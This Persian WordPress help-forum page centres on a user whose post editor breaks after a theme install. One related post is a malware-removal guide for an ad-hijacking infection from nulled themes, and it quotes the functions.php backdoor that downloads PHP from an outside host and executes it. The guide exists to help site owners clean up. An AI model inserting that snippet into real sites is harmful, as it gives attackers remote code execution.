• اطلاعیه ها

• Morteza

باهم بسازیم: اطلس ووکامرس و وردپرس   14/07/96

تاپیک ایجاد شده برای بحث در جهت ایجاد یک منبع، ویکی، صفحات توضیحی و یا بخش آموزشی جامع برای وردپرس و متعلقات مختلف آن است. لطفا جهت مشارکت در این بحث، ارائه پیشنهاد و یا انتقاد به تاپیک فوق مراجعه کنید. باهم بسازیم: اطلس ووکامرس و وردپرس
احمد وردپرس

باز نشدن صفحه ویرایشگر نوشته در قالب

5 پست در این موضوع قرار دارد

سلام

از وقتی که قالب good news رو روی وردپرسم نصب کردم در پیشخوان > نوشته جدید . یا ویرایش نوشته صفحه ویرایشگر من باز نمیشه چطور مشکلش رو برطرف کنم؟؟

ممنون

0

به اشتراک گذاری این پست

لینک به پست

اول یه قالب دیگر نصب کنید ببینید باز هم همین مشکل را دارد یا نه .

اگر مشکل از بین نرفت شاید مشکل از سرعت اینترنت باشد که زود لود نشود و اگر سرعت بالا بود وردپرس را ارتقا بدهید .

0

به اشتراک گذاری این پست

لینک به پست

قالب رو عوش کردم مشکلش حل شد

مشکلش با این قالبه که تازه نصب کردم . وردپرس هم ورژن 3.6 هست .(اخرشه

راهنمایی می کنید

0

به اشتراک گذاری این پست

لینک به پست

آدرس پوسته رو بدید

0

به اشتراک گذاری این پست

لینک به پست

بررسی کنید ورژن قالبی که نصب می کنید با ورژن وردپرس شما سازگار باشه.

0

به اشتراک گذاری این پست

لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

• مطالب مشابه

• توسط logomaster
      سلام دوستان . من دوتا لینک انتهای این تیکت میزارم که مربوط به یک قالب هست ( دو صفحه از یک قالب)
      ساختار کلی این قالب بسیار خوبه از دید من و میخواستم از تم فارست خریداری کنم ! اما به دلیل اینکه فروش خوبی نداشته ، پشتیبانی خوبی نداره و تا بحال فقط یکبار آپدیت شده ، نمیخوام ریسک کنم.
      حالا از دوستان اگر کسی یک قالب مشابه این ( از نظر ساختار و قالب بندی محتوا ، کدهای کوتاه و.... ) میشناسه به من معرفی کنه . این قالب خیلی خیلی به ایده آلی که من از یک قالب در ذهن دارم نزدیکه.
      http://demo.cmssuperheroes.com/themeforest/inbound-marketing/form/
      http://demo.cmssuperheroes.com/themeforest/inbound-marketing/services-2-2/
    • توسط mrasoul
      اینکه من بخوام به قالبی که خریدم یه صفحه ایی رو اضافه کنم میشه بحث غیر قانونی که بایگانیش می کنید ؟
      اگه یک قالبی که میخرید یه امکانی و نداشته باشه و شما بخوای بهش اضافه کنی حتما باید بری پیش پشتیبان قالب و هزینه کنی برات بهش اضافه کنه؟ خوب اگه میتونست که اضافه می کرد .
    • توسط mrasoul
      با عرض سلام و خسته نباشید خدمت همه وردپرسی ها
      این صفحه اول وبسایت من است هایو  .
      حالا من میخواهم این صفحه را با یک صفحه استاتیک جایگزین کنم و خوب تا اینجا مشکلی نیست اما مشکل اصلی آنجاست که من یک صفحه لازم دارم مانند همین صفحه اول سایت که تمامی پستها در آن قرار داشته باشد و ظاهر و حتی فوتر و تمامی بخش ها از جمله دکمه ی بارگذاری مطالب بیش مانند همین صفحه باشد و در اصل می توان گفت که همین صفحه اصلی کپی شود .
      من با استفاده از قالب صفحه page.php و کپی کردن کدهای فایل index اقدام به ساختن صفحه ای به اسم posts کردم و از داخل برگه ها نیز در موقع ساختن برگه جدید ،  قالب این برگه را نیز بر روی posts قرار دادم و این هم آدرس همین برگه ایی که ساختم .
      ملاحظه می کنید که اصلا پستها نمایش داده نشده است ... امیدوارم که کسی بتونه راهنماییم کنه که مشکل کجاست ؟
      چندتا فایل پیوستی هم قرار دادم یکیش صفحه posts.php که خودم ساختم و دیگر مابقی فایل ها

ink.rar
      posts.php
    • توسط master89
      دوستان سلام
      یک ویروس جدید اومده برای وردپرس که تبلیغات دزدید میکنه. به این صورت که پاپ آپ کلیکی باز میکنه و توی موبایل بدون کلیک پاپ آپ میذاره.
      جالبش اینجاس که روی آی پی Admin وردپرس پاپ آپ نداره و حتی کد هم نمیتونید پیدا کنید!
      شما میتونید از "پنجره ناشناس" فایرفاکس سایت خودتون رو باز کنید و کد و پاپ آپ رو ببینید. اما باز هم اگه با FTP برید داخل همون صفحه و بخواید کد رو پاک کنید. کد مخفی میشه. به این صورت که با هر بار بارگذاری صفحه کد از جایی بازخوانی میشه.
      توی انجمن های فارسی که بحثی ازش نشده فکر کنم، توی انجمن های خارجی هم بحث شده اما جوابی دریافت نشده.
      صفحه اصلی تبلیغ دزد: go.pub2srv.com هست. که هر بار لینک های تبلیغاتی متفاوتی همراه خودش میتونه داشته باشه. راه های زیادی برای از بین بردنش هست. اما باز بر میگرده و به مرور بیشتر میشه.
      نکته آخر : این ویروس با قالب های نال شده و غیر قانونی وارد وبسایت شما میشه. معمولا هم ارائه دهنده این قالب ها سایت vestatheme هست که اکثر وبسایت هایی که قالب های تجاری رو رایگان برای دانلود میذارن، از این وبسایت دریافت میکنند (پس اکثر سایت ها خطرناک شدن)
      آموزش حذف ویروس :
      اول سایتتون رو اینجا وارد کنید و چک کنید
      https://sitecheck.sucuri.net/  
      حالا برید داخل فلدر قالبتون / فایل function.php رو پیدا کنید و ویرایش کنید
      و قطعه کد زیر رو ازش حذف کنید
      if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; if($tmpcontent = @file_get_contents("http://www.aotson.com/code.php?i=".$path)) { function wp_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } extract(wp_temp_setup($tmpcontent)); } } ?> حالا افزونه  Exploit Scanner رو نصب کنید و اسکن کنید. پس از پایان اسکن ctrl+f رو بزنید و go.pub رو جستجو کنید. اگر نبود، یعنی همه چیز درسته.
      (این افزونه کد های مخفی رو پیدا میکنه و نمایش میده)
      سپاس
    • توسط shayan201680
      با سلام
      بنده یک سایت اصلی وردپرسی دارم و قرار شده که در ساب دامینشم از وردپرس استفاده کنم.
      الان میخوام کاری کنم که کاربران اگر در سایت اصلی ثبت نام کردند بتونند با همون مشخصات در ساب دامین نیز لاگین کنند و برعکس!
      ولی نمیدونم باید چکار کنم! 
      ممنون میشم اگر کسی بلده راهنمایی کنه، با تشکر...